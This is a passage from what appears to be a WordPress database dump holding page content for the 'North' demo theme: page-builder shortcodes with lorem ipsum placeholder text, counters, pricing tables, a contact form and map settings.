FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483630935{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709962068{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709968138{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506278206{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506285668{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409773973679{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309b72c-bddc\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309b72c-bddc\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309b72c-bddc\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home7','','publish','open','open','','home7','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/?page_id=721',0,'page','',0),(1923,1,'2014-07-15 13:13:51','2014-07-15 13:13:51','[vc_row css=\".vc_custom_1405454957992{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #4c4c4c !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"false\" bg_overlay=\"dark\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][vntd_fullscreen_slider text_static=\"Welcome to North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" bg_overlay=\"dark1\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"WE CREATE AWESOME THEMES!,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483630935{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709962068{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709968138{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506278206{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506285668{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409773973679{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309b72c-bddc\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309b72c-bddc\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 